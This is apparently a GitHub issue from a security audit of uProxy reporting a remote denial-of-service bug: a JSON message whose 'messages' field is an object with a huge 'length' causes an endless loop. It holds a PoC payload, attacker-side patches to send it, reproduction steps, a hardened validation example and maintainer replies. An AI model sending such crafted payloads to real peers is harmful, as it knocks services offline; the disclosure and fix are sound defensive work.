
UP-01-002 DoS through insufficient JSON Type Verification

Open cure53 opened this issue 11 years ago • 3 comments

The files rtc-to-net.ts and socks-to-rtc.ts loop over an array that is received over the network as JSON - without checking that the array is not actually an object. By supplying a specifically crafted object, it is possible to remotely cause an endless loop:

PoC: { version: 1, messages: {length: 9007199254740992} }

To test this, one can modify the code using this JSON object whenever a sendSignalToPeer event is emitted. In our tests, when such a modified client connected to the server, this caused the server to loop for a few seconds before it was terminated by Chrome and had to be restarted manually.

Steps to reproduce:

_Attacker:_ Open the directory containing the chrome app, apply the following patch:

diff -rupN build/chrome/app/lib/socks-rtc/rtc-to-net/rtc-to-net.js build/chrome/app_manipulated/lib/socks-rtc/rtc-to-net/rtc-to-net.js
--- build/chrome/app/lib/socks-rtc/rtc-to-net/rtc-to-net.js    2014-08-25 10:23:33.636076223 +0200
+++ build/chrome/app_manipulated/lib/socks-rtc/rtc-to-net/rtc-to-net.js    2014-08-25 12:22:04.716132556 +0200
@@ -168,7 +168,7 @@ var RtcToNet;
                         peerId: peerId,
                         data: JSON.stringify({
                             version: 1,
-                            messages: queuedMessages
+                            messages: {length: 9007199254740992} /* causes infinite loop for the recipient */
                         })
                     });
                     queuedMessages = [];
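Review bot: the defect this hunk exercises is on the receiving side, not in these lines: after `JSON.stringify`, `{length: 9007199254740992}` arrives as a plain object that still carries a numeric `length`, so a recipient that iterates `for (i = 0; i < messages.length; i++)` without first confirming `Array.isArray(messages)` (the rtc-to-net.ts loop the issue describes) attempts 2^53 iterations; the fix belongs in the receiver's parse path, which should reject any `messages` value that is not an actual array and cap its length.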
diff -rupN build/chrome/app/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js build/chrome/app_manipulated/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js
--- build/chrome/app/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js    2014-08-25 10:23:33.638076223 +0200
+++ build/chrome/app_manipulated/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js    2014-08-25 12:23:13.930133104 +0200
@@ -49,7 +49,7 @@ var SocksToRTC;
                                 peerId: peerId,
                                 data: JSON.stringify({
                                     version: 1,
-                                    messages: queuedMessages
+                                    messages: {length: 9007199254740992} /* causes infinite loop for the recipient */
                                 })
                             });
                             queuedMessages = [];
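Review bot: this is the same substitution as the rtc-to-net.js hunk, applied to the other end of the SOCKS-to-RTC channel; since either peer can be the sender of a signalling message, the `Array.isArray` and length-bound check has to be added to the receive path of both socks-to-rtc.ts and rtc-to-net.ts, not to just one of them.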

_Attacker:_ Request permission to proxy from the victim
_Victim:_ Grant permission to proxy
_Attacker:_ Connect to proxy

To mitigate this issue, it should be verified that incoming JSON objects conform to the expected format. It might be an option to use the “conform” helper provided by freedom.js for that very purpose.

cure53 avatar Aug 26 '14 16:08 cure53
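The receiver-side check the issue asks for, as an added example that is not uProxy code and not the freedom.js "conform" helper. It assumes the signal format given in the report (`{ version: 1, messages: [...] }`), assumes each element of `messages` is a non-null object (the issue does not define the element format), and uses hypothetical names (`parseSignalMessage`, `processMessages`, `unsafeLoopBound`, `MAX_MESSAGES`). It shows why `messages.length` alone is not a safe loop bound and how a strict shape check rejects the PoC before any loop runs.

```javascript
// Added example (not uProxy code): validate a signalling message before
// iterating over it. Format assumed from the issue: { version: 1, messages: [ ... ] }.
// Element format is assumed to be a non-null object; MAX_MESSAGES is an assumed bound.

const MAX_MESSAGES = 1000;

// Constructed wire payloads, as they would look after the sender's JSON.stringify.
// POC_WIRE is the object from the issue; BENIGN_WIRE is a normal queue of two messages.
const POC_WIRE = JSON.stringify({ version: 1, messages: { length: 9007199254740992 } });
const BENIGN_WIRE = JSON.stringify({ version: 1, messages: [{ type: 'offer' }, { type: 'candidate' }] });

// The vulnerable pattern: trusting messages.length as a loop bound.
// Only the bound is computed here; nothing iterates, so this is safe to run.
function unsafeLoopBound(wire) {
  const signal = JSON.parse(wire);
  return signal.messages.length; // a plain object keeps its numeric `length` through JSON
}

// Hardened parse: accept only the exact expected shape, otherwise throw.
function parseSignalMessage(wire) {
  let signal;
  try {
    signal = JSON.parse(wire);
  } catch (e) {
    throw new Error('signal is not valid JSON');
  }
  if (signal === null || typeof signal !== 'object' || Array.isArray(signal)) {
    throw new Error('signal is not an object');
  }
  if (signal.version !== 1) {
    throw new Error('unsupported signal version');
  }
  // Array.isArray is the decisive check: {length: N} has a numeric length but is not an array.
  if (!Array.isArray(signal.messages)) {
    throw new Error('messages is not an array');
  }
  // Even a real array needs an upper bound so a peer cannot force unbounded work.
  if (signal.messages.length > MAX_MESSAGES) {
    throw new Error('too many messages');
  }
  for (const m of signal.messages) {
    if (m === null || typeof m !== 'object') {
      throw new Error('message element is not an object');
    }
  }
  return { version: signal.version, messages: signal.messages };
}

// Processing loop that only ever runs over validated input; returns the count handled.
function processMessages(wire) {
  const signal = parseSignalMessage(wire);
  let handled = 0;
  for (let i = 0; i < signal.messages.length; i++) {
    handled++; // real per-message handling would go here
  }
  return handled;
}

// Helper for inspection: the rejection reason for a payload, or null if it validates.
function rejectionReason(wire) {
  try {
    parseSignalMessage(wire);
    return null;
  } catch (e) {
    return e.message;
  }
}
```

Note that `unsafeLoopBound(POC_WIRE)` returns 9007199254740992 (2^53): a loop with that bound would never finish in practice, which is the behaviour the report observed. `processMessages` can only reach its loop through `parseSignalMessage`, so the PoC is rejected with "messages is not an array" before any iteration happens.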

Ooo! to avoid duplicating work, for networking code, please review the new branch that's about to land... https://github.com/uProxy/uproxy-networking/tree/iislucas-webrtc_pc3

Thanks!

iislucas avatar Aug 26 '14 16:08 iislucas

Nice find by the way!

iislucas avatar Aug 26 '14 16:08 iislucas

Aye, we shall ;) Thx!

cure53 avatar Aug 26 '14 16:08 cure53